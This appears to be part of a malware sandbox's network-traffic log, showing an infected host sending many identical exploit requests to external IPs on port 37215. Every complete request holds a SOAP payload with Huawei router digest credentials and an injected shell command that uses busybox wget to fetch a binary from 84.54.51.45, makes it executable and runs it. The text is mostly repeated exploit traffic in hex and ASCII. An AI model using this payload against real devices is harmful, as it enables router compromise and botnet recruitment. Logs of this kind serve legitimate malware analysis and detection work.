20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            480192.168.2.155452641.145.215.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786520958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            481192.168.2.155607641.76.67.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786545992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            482192.168.2.153770641.210.141.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786562920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            483192.168.2.154337841.234.16.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786586046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            484192.168.2.155012241.8.102.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786617041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            485192.168.2.154172441.85.150.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786643982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            486192.168.2.155901041.194.89.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786674976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            487192.168.2.155837841.85.126.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786710024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            488192.168.2.154120041.15.109.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786725044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            489192.168.2.155498441.221.116.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786756039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            490192.168.2.153598441.78.219.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786773920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
